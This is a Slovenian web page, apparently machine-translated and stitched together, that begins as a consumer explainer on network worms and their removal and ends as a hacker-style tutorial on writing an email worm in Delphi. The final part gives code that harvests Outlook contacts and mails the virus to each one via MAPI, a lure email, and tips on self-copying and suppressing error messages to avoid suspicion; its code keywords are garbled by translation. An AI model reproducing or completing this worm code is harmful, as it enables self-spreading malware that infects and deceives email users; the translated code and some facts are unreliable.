Virusi internetni črvi. Kaj so računalniški črvi? Oglejte si, kaj je "računalniški črv" v drugih slovarjih

Računalniški virusi, zlonamerna programska oprema - vse to je uničujoče za operacijski sistem. Kaj storiti? Kako premagati osovražene virusne programe? Uporabniki začetniki bodo rekli, da je dovolj, da namestite protivirusni program. A ni tako preprosto. Konec koncev, da bi premagali virus, morate vedeti, kateri vrsti pripada.

Ena najpogostejših zlonamernih programov je virus črv. Kako zaščititi svoj računalnik pred vdorom tega nepovabljenega gosta in kaj točno je?

Kaj je "virus črv"?

Obstaja ogromno vrst zlonamerne računalniške programske opreme. Eden tistih virusov, ki se jih je po okužbi precej težko znebiti, je virus »omrežni črv«. To je samopodvajajoč se računalniški program, ki prodira v lokalna in globalna omrežja. Hkrati je pomembna razlika med navadnim virusom in tem zlonamernim programom ta, da je drugi popolnoma neodvisen.

Vrste mrežnih črvov

Računalniški virusni črvi so razdeljeni v tri kategorije, ki se bistveno razlikujejo po svojih lastnostih in škodi, ki jo povzročajo napravi.

  • Prva kategorija so e-poštni črvi. Običajno so razdeljeni v eni datoteki po e-pošti. Uporabnik prejme pismo neznanega prejemnika s priponko. Seveda, podlegel radovednosti, sam odpre priponko, ki že vsebuje mrežnega črva, po katerem pride do okužbe.
  • Druga kategorija, ki je najpogostejša med zlonamerno programsko opremo, so črvi, ki prebivajo v RAM-u. Ta virus ne okuži trdih diskov, ampak se vstavi v RAM in s tem poškoduje delujoče programe. Da se tak črv "vrne domov", je dovolj, da znova zaženete računalnik.
  • Tretja in najnevarnejša kategorija so črvi, ki shranjujejo kodo na trdi disk naprave. Najpogosteje se uporabljajo za povzročitev neke vrste informacijske škode, na primer za izvedbo napada DoS. In tukaj ponovni zagon računalnika ne bo rešil težave. Tukaj bodo pomagali samo visokokakovostni protivirusni sistemi, pa še to ne vsi. Z zdravljenjem okuženega diska se morate lotiti čim prej, sicer se boste morali posloviti od celotnega operacijskega sistema.

Kako in s kakšnim namenom se omrežni črvi širijo?

Takšne viruse širijo hekerji za doseganje različnih ciljev. Nekateri programi so namenjeni prestrezanju nadzora nad napravo. Hkrati uporabnik sam ne bo nikoli opazil, kaj počne virus črva. Drugi uporabljajo okužen računalnik kot način za širjenje virusa po vseh razpoložljivih omrežjih, tako lokalnih kot globalnih.

Hekerji so iznašli veliko različnih načinov za širjenje črva. Najpogosteje gre za virus, ki ga mora uporabnik na začetku sam zagnati na svojem računalniku. To je lahko elektronska priloga ali kakšen mini program, prenesen z interneta. Vendar pa obstajajo tudi tisti, ki ne potrebujejo posredovanja nekoga drugega, da okužijo napravo, v katero prodrejo neodvisno.

Kako se zaščititi?

Če želite preprečiti, da bi virus okužil vaš računalnik, morate poznati zaščitne ukrepe. Mnogi bodo rekli, da bo vsak protivirusni program dovolj, saj takoj blokira viruse, ko vstopijo v sistem. Pravzaprav to ni res. Protivirusni program črvu ne bo mogel pravočasno preprečiti vstopa v napravo, saj preprosto opozori, da je na določenem mestu zaznan zlonamerni program. Večina uporabnikov temu ne pripisuje nobenega pomena z zagonom ali prenosom okužene datoteke v svoj računalnik.

Odlična možnost za zaščito pred tovrstno programsko opremo je proaktivna tehnologija. Za razliko od običajnih protivirusnih programov bo ta tehnologija preprečila okužbo sistema, namesto da bi iskala že znane viruse na trdih diskih. V tem primeru bo virus blokiran le, če predstavlja resnično grožnjo OS.

Omrežni črv: kako odstraniti virus?

Če zlonamerna programska oprema pride v vaš računalnik, jo morate takoj odstraniti. Toda kako odstraniti virus, ne da bi poškodovali operacijski sistem? V takšni situaciji bodo protivirusni programi priskočili na pomoč neizkušenim uporabnikom. Na srečo njihova namestitev ne bo vzela veliko časa.

  • Kaspersky Rescue Disk- program, ki vam omogoča čiščenje trdih diskov pred virusi z upravljanjem sistema. Če želite začeti delati s programom, morate zapisati zagonsko disketo s sliko ISO. In nato samo zaženite operacijski sistem v BIOS-u prek njega.
  • Orodje za odstranjevanje virusa Kaspersky bolj primeren za začetnike in tiste, ki še niso razumeli zapletenosti sistema. Poišče zlonamerno programsko opremo v vašem računalniku in jo odstrani iz sistema. Vendar pa se ne more spopasti z vsemi vrstami virusov.

  • Dr.Web CureIt lahko nadomesti prejšnji protivirusni program. Njegova velika pomanjkljivost je, da skeniranje trdih diskov traja zelo dolgo. Včasih lahko to traja približno deset ur. Seveda je tako dolgo skeniranje znak, da program skrbno pregleda vsako datoteko. Vendar pa ni veliko ljudi, ki bi bili pripravljeni porabiti ves dan za iskanje enega virusa.

Previdnostni ukrepi

Da bi se zaščitili pred hekerskimi napadi z virusi, vam ni treba namestiti kopice posebnih varnostnih programov v računalnik. Dovolj je, da upoštevate varnostne ukrepe v omrežju, potem nobena zlonamerna datoteka ne bo prišla v napravo.

  • Če po elektronski pošti prejmete pomembno sporočilo s priponko, ga ne hitite odpreti. Najprej morate prilogo shraniti na disk in jo nato zagnati s katerim koli brskalnikom. Morda je bila v računalniku namesto besedilnega dokumenta ali fotografije prejeta izvršljiva datoteka.
  • V nobenem primeru ne smete zagnati nobenega programa, ki ste ga prejeli po e-pošti z neznanega naslova. Najverjetneje je v napravo prišla hekerska datoteka.
  • Tudi če priponka prihaja iz že znanega e-poštnega sporočila, je ne smete hiteti odpreti. Najprej ga morate skenirati z protivirusnim programom. Možno je, da je e-poštni naslov, s katerega je prišlo pismo, že okužen z zlonamerno programsko opremo in zdaj preprosto pošilja glasilo vsem shranjenim stikom.
  • Znak, da bo poslana priponka vsebovala virus, je lahko senzacionalna novica v sporočilu. To je zgolj vaba, ki uporabnika zanima za vsebino in iz radovednosti odpre okuženo datoteko.

Črv je na nek način podoben računalniškim virusom. Ta program je zmožen tudi ponavljajoče se reprodukcije v pomnilniku računalnika, vendar ne more vedno motiti delovanja opreme. Črv deluje prikrito in ga ni tako enostavno odkriti. Počutijo se, ko nekateri programi ali sam operacijski sistem začnejo zamrzniti. Hkrati črv uporablja vse razpoložljive vire računalnika, vključno s programsko opremo.

Običajno črv vstopi v pomnilnik računalnika kot ena aplikacija. Za razliko od virusov ta program ni pritrjen na posamezne aplikacije. Najpogosteje lahko črva ujamete prek interneta.

Najbolj znani virusi so črvi.

Tipičen primer je "Branje kode". To je preprost internetni črv, ki okuži računalnike z Microsoftovo programsko opremo. Ta črv je že uspel okužiti več kot 6 milijonov strežnikov po vsem svetu. Ko je v pomnilniku, lahko Code Read sproži napad na določen računalnik v omrežju z uporabo njegovega edinstvenega naslova IP. Malo kasneje so se pojavili novi predstavniki programov ekipe "Črv" - "Code Reed II". To je bolj agresiven brat, ki ohranja podobne slabosti in principe delovanja. Njegovo jedro vsebuje trojanca, ki je sposoben popolnoma podrediti operacijski sistem. (Lahko preberete več o trojancu) Nemogoče je ne omeniti NIMDA. Koda te aplikacije je kombinacija trojanca in navadnega črva. Znano je, da se hitro razmnožuje in je pokvarilo razpoloženje že več kot 8 milijonom skrbnikov omrežja.

Kako zaščititi svoj računalnik pred virusom?

Obstaja več preprostih pravil, katerih upoštevanje zagotavlja varnost operacijskega sistema:

  • Če niste prepričani o zanesljivosti portala, pojdite mimo.
  • uporabljajte manj nelicenčnih programov.
  • Sistemskih ukazov ne smete vnašati pod narekom neznanega "pomočnika".

Ne pozabite, da noben protivirusni program ne zagotavlja 100-odstotne zaščite.

Obstaja veliko več načinov, kako se zaščititi pred virusi, tukaj so opisani le najpreprostejši in najučinkovitejši. Da preprečite vstop virusa v vaš računalnik, je priporočljivo, da namestite protivirusni program in pogosteje posodabljate bazo virusov.

Sodoben črv se lahko razvije in postane bolj zvit, zato se ne morete zanesti le na protivirusni program. Sčasoma se virusi okrepijo, vendar jih ni mogoče odkriti.

Druge metode zaščite.

Windows ima vgrajen zaščitni sistem – požarni zid, ki se lahko bori proti virtualnim črvom. Poleg tega strokovnjaki priporočajo uporabo preizkušenih programov in ne nalaganje vsega. Klasične viruse je mogoče nevtralizirati s pomočjo Firewall Plus - preproste aplikacije za boj proti trojancem, zapisovalcem tipk in drugim zlim duhom. Ne pozabite, da je svetovni splet priljubljeno mesto za črve, torej Ne odpirajte elektronske pošte neznanih oseb s pripetimi datotekami.

Nazadnje.

Še en pomemben nasvet. Zlonamerna koda je zasnovana tako, da poškoduje datoteke in osebne podatke. Zato, Vedno mora obstajati varnostna kopija podatkov na ločenem mediju. Ne smemo pozabiti, da večina črvov vstopi v računalnik prek arhivov z brezplačnimi aplikacijami. In ne pozabite, da lahko neželena pošta prinese tudi nepovabljenega gosta v obliki elektronske pošte z ZIP arhivom.

Vrste črvov se razlikujejo po naslednjih značilnostih: po načinu širjenja črva - kako prenese kopijo na oddaljene računalnike, po načinu zagona kopije črva na okuženem računalniku, po načinu vnosa v sistem, poleg tega s takšnimi značilnostmi, kot so poliforičnost, prikritost in druge vrste zlonamerne programske opreme (virusi, trojanci).

O e-poštnih črvih - Email-Worm

Za to kategorijo črvov je značilno, da za širjenje uporabljajo elektronsko pošto. Črv deluje na naslednji način: pošlje svojo kopijo kot priponko k e-poštnemu sporočilu ali pošlje povezavo do svoje datoteke, ki se nahaja v enem od omrežnih virov, na primer URL do okužene datoteke, ki se nahaja na vdrtem ali hekerskem spletnem mestu. Posledično se aktivira koda črva, ko odprete okuženo priponko ali povezavo do okužene datoteke.

Najpogostejši načini, na katere poštni črvi pošiljajo okužena sporočila, so:

  • uporaba storitev MS Outlook;
  • prek funkcij Windows MAPI;
  • prek neposredne povezave s strežnikom SMTP z uporabo poštne knjižnice, vgrajene v kodo črva.

Metode, ki jih e-poštni črvi uporabljajo za iskanje e-poštnih naslovov za pošiljanje okužene e-pošte:

  • se lahko pošiljajo na vse naslove, ki jih najdejo v imeniku MS Outlook, in na naslove, ki jih najdejo v nabiralniku, nekateri poštni črvi pa lahko celo »odgovarjajo« na pisma, najdena v nabiralniku;
  • pregledajo datoteke, ki so jim na voljo na disku, in v njih označijo vrstice, ki so prepoznane kot e-poštni naslovi.

V bistvu črvi uporabljajo več zgornjih metod hkrati. Obstajajo tudi druge metode za iskanje "elektronskih" naslovov.

Črvi, ki uporabljajo internetne messengerje - IM-Worm

Črvi te vrste uporabljajo edini način razmnoževanja: pošljejo se zaznanim stikom s sporočili na seznamu stikov; ti stiki vsebujejo URL do datoteke, ki se nahaja na enem od spletnih strežnikov. Ta tehnika je skoraj enaka metodi distribucije, ki jo uporabljajo poštni črvi.

IRC-črv - črvi v kanalih IRC

Tako kot e-poštni črvi ima ta vrsta črva dva načina širjenja po kanalih IRC.

Drugi način: pošiljanje okužene datoteke nesrečnemu uporabniku. Napadeni uporabnik mora pravočasno potrditi sprejem te datoteke, jo nato shraniti na disk in odpreti (zagnati).

Net-Worm - drugi mrežni črvi

Za prvo metodo je značilno, da črv poskuša najti oddaljene računalnike, potem ko jih najde, se kopira v imenike, ki so odprti za branje in pisanje, če obstajajo. Črvi te vrste lahko preprosto prečkajo razpoložljive omrežne imenike z uporabo funkcij operacijskega sistema. Ali pa bodo takšni črvi naključno iskali računalnike v globalnem omrežju in ob povezovanju z računalniki poskušali odpreti njihove diske za popoln dostop.

Druga metoda je možna, če so v računalniški programski opremi kritične ranljivosti. Ti črvi iščejo takšne računalnike in pošljejo posebej oblikovan omrežni paket ali zahtevo (vulnerability exploit), s čimer koda črva prodre v računalnik. Če omrežni paket vsebuje le del kode črva, črv po prodoru prenese glavno datoteko in jo zažene za izvajanje.

Posebna kategorija vključuje črve, ki za distribucijo uporabljajo spletne in FTP strežnike. Proces okužbe lahko razdelimo na dve stopnji: v prvi fazi črv prodre v računalniški strežnik in na določen način spremeni servisne datoteke strežnika (kot primer lahko navedemo statistične spletne strani). Nato počaka na obiskovalce, ki želijo zahtevati informacije od tega okuženega strežnika, in tako prodre v druge računalnike v omrežju.

V bistvu računalniški črvi uporabljajo več kot eno metodo za širjenje svojih kopij po omrežjih (lahko imajo dve ali več metod za napad na oddaljene računalnike).

Črvi za omrežja za izmenjavo datotek - P2P-črv

Za infiltracijo v omrežje P2P se tak črv prekopira v imenik za skupno rabo datotek, ki se običajno nahaja na lokalnem računalniku. Vse ostalo se bo v nekem smislu zgodilo samo od sebe, saj bo nalogo širjenja virusa prevzelo omrežje P2P – z iskanjem po omrežju bo o tej datoteki obveščalo oddaljene uporabnike in zagotavljalo vse potrebno za prenos datoteke iz okuženega računalnika.

Obstajajo tudi bolj zapleteni črvi P2P, ki lahko posnemajo omrežni protokol resničnega sistema za izmenjavo datotek in se pozitivno odzovejo na iskalne poizvedbe; v tem primeru črv ponudi svojo kopijo za prenos.

Glavni način, po katerem se črvi razlikujejo med seboj, je način, kako se črv širi. Drugi znaki razlike so načini zagona kopije črva na okuženem računalniku, načini vnosa v sistem, pa tudi polimorfizem, prikritost in druge značilnosti, značilne za druge vrste zlonamerne programske opreme (virusi in trojanci).

Vrste črvov

Glede na način prodiranja v operacijski sistem črve delimo na:

  • Poštni črvi(Mail-Worm) - črvi, ki se širijo v obliki e-poštnih sporočil. V tem primeru črv pošlje bodisi svojo kopijo kot priponko k e-poštnemu sporočilu bodisi povezavo do svoje datoteke, ki se nahaja na nekem omrežnem viru (na primer URL do okužene datoteke, ki se nahaja na vdrtem ali hekerskem spletnem mestu). V prvem primeru se koda črva aktivira, ko se odpre (zažene) okužena priponka, v drugem primeru pa se odpre povezava do okužene datoteke. V obeh primerih je učinek enak - aktivira se koda črva.
  • IM črvi(IM-Worm) - črvi, ki uporabljajo internetne messengerje. Znani računalniški črvi te vrste uporabljajo edino metodo širjenja - pošiljanje sporočil zaznanim stikom (s seznama stikov), ki vsebujejo URL do datoteke, ki se nahaja na nekem spletnem strežniku. Ta tehnika skoraj popolnoma posnema podobno metodo pošiljanja pošte, ki jo uporabljajo poštni črvi.
  • P2P črvi(P2P-Worm) - črvi, ki se širijo prek omrežij za izmenjavo datotek enakovrednih. Mehanizem delovanja večine teh črvov je precej preprost - za infiltracijo v omrežje P2P se mora črv le kopirati v imenik za skupno rabo datotek, ki se običajno nahaja na lokalnem računalniku. Omrežje P2P poskrbi za vse ostalo delo pri širjenju virusa - pri iskanju datotek v omrežju bo o tej datoteki obvestilo oddaljene uporabnike in zagotovilo vse potrebne storitve za prenos datoteke z okuženega računalnika. Obstajajo bolj zapleteni črvi P2P, ki posnemajo omrežni protokol določenega sistema za skupno rabo datotek in se pozitivno odzivajo na iskalne zahteve – medtem ko črv ponuja svojo kopijo za prenos.
  • Črvi v kanalih IRC(IRC-črv). Ta vrsta črva, tako kot e-poštni črvi, ima dva načina širjenja črva po kanalih IRC, ki ponavljata zgoraj opisane metode. Prvi vključuje pošiljanje URL-ja kopiji črva. Drugi način je pošiljanje okužene datoteke nekemu uporabniku omrežja. V tem primeru mora napadeni uporabnik potrditi prejem datoteke, jo nato shraniti na disk in odpreti (zagnati za izvedbo).
  • Omrežni črvi(Net-Worm) - drugi omrežni črvi, med katerimi je smiselno dodatno ločiti internetne črve in črve LAN
    • Internetni črvi- črvi, ki za širjenje uporabljajo internetne protokole. Večinoma se ta vrsta črva širi z napačno obdelavo osnovnih paketov protokolnega sklada TCP/IP s strani nekaterih aplikacij.
    • LAN črvi- črvi, ki se širijo prek lokalnih omrežnih protokolov

Danes vam bom opisal princip delovanja mrežnega virusa. Tema je, kot razumete, zelo pomembna, saj je 70% mojega osebnega poštnega predala vedno polnega virusov vseh vrst
- od majhnih, a zlobnih črvov VBS do enega in pol megagramskih del mlajših šolarjev :) Ne vedo za obstoj WinAPI :)

Za prodor v računalnik lahko virusi uporabijo hrošče v programski opremi uporabnika (VBS+Outlook=love:)) ali hrošče v glavi uporabnika. Poglejmo primer takšnega virusnega pisma:

Zadeva: Smešno
Zdravo! Drži kul šalo, ki sem ti jo obljubil (ali ne tebi, se ne spomnim :)). Ampak vseeno ga obdrži. Ne skrbite, dejansko ne formatira ničesar!
Ne pozabi preveriti, paranoik :)
Vso srečo!
Priložite: fake_format.exe

No, tukaj je: vsak šepavi uporabnik interneta nenehno pošilja šale svojim prijateljem in se zato v resnici ne spomni, komu je kaj obljubil; sporočilo o "lažnem oblikovanju" preklopi možgane žrtve na šale in slepo vero v antiviruse
- zaključi 🙂 Naj vas spomnim, da algoritmov, ki sem jih opisal, ne določajo nobeni spleti, avp in drugi borci.

Skratka, sam sem že hotel začeti to smešno šalo. ga lansiram :)

Napaka ... intel pentium 5 ni najden!

Oh ... Zdi se, da ne deluje? Ne, nisem uganil 🙂 Pravzaprav je virus svoje telo takoj prenesel na trdi disk žrtve, se prijavil za zagon in bo zdaj visel v RAM-u (namig: v medicinskem žargonu je »RAM« OPERATIVNA KIRURGIJA, zato bodite previdni;)) žrtve po principu, ki sem ga opisal v članku "Do-it-yourself rezidentni virus". Samo ne bo preverjal zagona datotek, ampak povezavo z internetom 🙂 (v izvorni kodi bo to postopek IsOnline, torej za naprej;)). Vendar pa hkrati
nihče vam ne preprečuje spremljanja zagona datotek
- še vedno je virus, čeprav je omrežni virus. Zato bom v logiko vključil postopek InfectFile. Zato bomo uporabili naslednje funkcije in postopke:

ISONLINE - preverjanje internetne povezave
SENDVIRUS - ugani trikrat 😉
GETMAILS - pridobite naslove iz Outglitchovega imenika
INFECTFILES - 🙂
WORKMEMORY - skoraj enako kot v prejšnjem članku, vendar s spremembami.

KODIRANJE

Pred začetkom dejanskega kodiranja bo tokrat potrebno veliko predhodnega božanja :) Bom razložil zakaj: za branje adresarja bomo do Outlooka dostopali preko medprogramskega vmesnika, za to pa ni slabo, če uporabimo njegov knjižnica tipov. Torej naredite: knjižnica tipov za uvoz projektov in poglejte tam ... tako je, Outlook Express v.9 ali karkoli že imate. Za deveto različico velja, da je, če se ne motim, iz Office2k. Uvoženo? Kaj pomeni "ni na seznamu"? V redu, se zgodi. Iskanje ročno
- v imeniku s pisarno je datoteka msoutl.olb. To je to 😉 Sedaj pa v rubriko za uporabo vpišite outlook_tlb in imeli boste dostop do najbolj intimnih mest v vašem adresarju 🙂 Oh, danes sem malo zaskrbljen 😉
Na splošno bi moral postopek črtanja adresarja izgledati takole:

uporablja
ComObj, outlook_tlb,
Obrazci;
....
Postopek GET MAILS;
var
MyFolder, MSOutlook, MyNameSpace, MyItem: različica; s: niz;
num, i: Celo število;
pošta: niz nizov;

začeti
MSOutlook:= CreateOleObject("Outlook.Aplikacija");
MyNameSpace:= MSOutlook.GetNameSpace("MAPI");
MyFolder:= MyNamespace.GetDefaultFolder(olFolderContacts);
SetLength(mails,MyFilder.Items.Count);
for i:= 1 v MyFolder.Items.Count do
začeti
MyItem:= MyFolder.Items[i];
mails[i]:= myitem.email1addres;
konec;

No, ste uživali v tem, kar sem napisal? Joj, samo še slabše bo. Ker bo virus poslan s čistim API-jem. In to, kot pravi Horrific: "enako kot pri ročnem seksu, učinek je v obeh primerih, vendar traja dolgo časa, da se ga doseže in ni takega hrupa" :) No
pa kaj sem tukaj napisal? Uses Comobj nam omogoča delo s tehnologijo COM; Nato samo ustvarimo objekt OLE Outlook in iz njega ciklično pridobimo seznam e-poštnih sporočil. Če želite izvedeti še kaj
- tudi to je resnično, preberite dokumente - vladajo. Tudi v angleščini. Seznam e-poštnih sporočil je zapisan v dinamični niz nizov. Uporabljala ga bo funkcija SendVirus. Tale:

funkcija SendVirus(const RecipName, RecipAddress, Subject, Attachment: niz): Boolean;
var
MapiMessage: TMapiMessage;
MapiFileDesc: TMapiFileDesc;
MapiRecipDesc: TMapiRecipDesc;
i:celo število;
s: niz;
začeti
začnite z MapiRecipDesc ​​​​
ulReserved:= 0;
ulRecipClass:= MAPI_TO;
lpszName:= PChar(RecipName);
lpszAddress:= PChar(RecipAddress);
uleIDSize:= 0;
lpEntryID:= nič;
konec;

začnite z MapiFileDesc
ulRezervirano:= 0;
flZastavice:= 0;
nPoložaj:= 0;
lpszPathName:= PChar(Priloga);
lpszFileName:= nil;
lpFileType:= nič;
konec;

začnite z MapiMessage
ulRezervirano:= 0;
lpszSubject:= nič;
lpszNoteText:= PChar(Zadeva);
lpszMessageType:= nič;
lpszDateReceived:= nič;
lpszConversationID:= nič;
flZastavice:= 0;
lpOriginator:= nič;
nRecipCount:= 1;
lpRecips:= @MapiRecipDesc;
če je dolžina (priloga) > 0, potem začnite
nFileCount:= 1;
lpFiles:= @MapiFileDesc;
konec drugače začeti
nFileCount:= 0;
lpDatoteke:= nič;
konec;
konec;

Rezultat:= MapiSendMail(0, 0, MapiMessage, MAPI_DIALOG
ali MAPI_LOGON_UI ali MAPI_NEW_SESSION, 0) = USPEH_USPEH;
konec;

Ste se napihnili, ko ste to brali? Pojdi na pivo, sicer ti ne bo nič jasno.
Ste pili? Jaz tudi 😉 V redu, gremo naprej. Uporabili ga boste takole:

Za i:= 1 do dolžine (pošte) do
začeti
SendVirus("",mails[i],"pricol".");
konec;

Tukaj bomo uporabljali uporabo MAPI, zato je ne pozabite prijaviti. Skratka to
- delo s pošto na nizki ravni. In za delo s pošto, kot veste, morate imeti a)
prejemnikov elektronski naslov b) besedilo pisma c) priponka. To počnem:
MapiRecipDesc ​​​​- opišite prejemnika, MapiFileDesc - priloga,
tiste. naš virus, MapiMessage je sporočilo, potem ga bom poslal v veliki svet z ukazom MapiSendMail 😉 No, izkazalo se je, da ni tako težko. Glavna stvar je razumeti, da je vaš največji prijatelj
- to ni c:\porno, ampak win32.hlp :)

Kako lahko zdaj vso to besedičenje umestimo v ostro logiko virusa? To boste ugotovili sami, o tem vam govorim že 2 članka zapored. In sicer, včeraj sem praznoval rojstni dan mojega dekleta, zdaj mi že kar malo razbija glava :) No, okej, občutek dolžnosti je močnejši. Samo naredi:
Prva vrstica je, da preverite ime datoteke, iz katere ste začeli. če
pricol.exe pomeni CopyFile to Windows :) In če si začel iz imenika Windows
- nato ciklično preverjajte svojo povezavo s svetovnim 😉 omrežjem. Preverjamo:

funkcija IsOnline: Boolean;
var
RASConn: TRASConn;
dwSize,dwCount: DWORD;
začeti
RASConns.dwSize:= SizeOf(TRASConn);
dwSize:= SizeOf(RASConns);
Res:=RASEnumConnectionsA(@RASConns, @dwSize, @dwCount);
Rezultat:= (Res = 0) in (dwCount > 0);
konec;

torej. Če je vse v redu, nadaljujte - pretresite imenik in pošljite pošto. Tukaj sta dva trika. Če je vaše ime
pricol.exe - takoj preverite povezavo. Uporabnik morda preverja e-pošto na spletu. To bo močno povečalo naše možnosti za prejemanje glasila. Drugi trik ste že sami ugotovili,
namreč v scenariju, ki sem ga opisal, boste vedno pošiljali enaka pisma istemu uporabniku, samo zato, ker ni bil izbrisan iz imenika. Zato vse obdelane naslove zapišite v dnevniško datoteko in jo nenehno preverjajte. Zdi se, da je to to. Čeprav št. Ne pozabite priložiti fragmentov kode, nagnjenih k napakam, v try..except. In vstavite ključ ($D-). Ker če uporabnik nenadoma zazna napako, kot je »FUCK« ni veljavna celoštevilska vrednost,« bo nekaj posumil.

ZAKLJUČEK

Ta zadnji članek govori o virusih, odpravljenih za Windows 9x. Pred kratkim sem formatiral vijak in namestil WindowsXP Professional, zato bodo naslednji primeri zanj. Delphi 7 pa že počasi lahko kupiš, saj sem šestice nekje posejal, zdaj pa čisto gol sedim :) Temu primerno bom kupil sedmico 😉

Naslednji članek bo verjetno posvečen steganografiji in njeni praktični uporabi.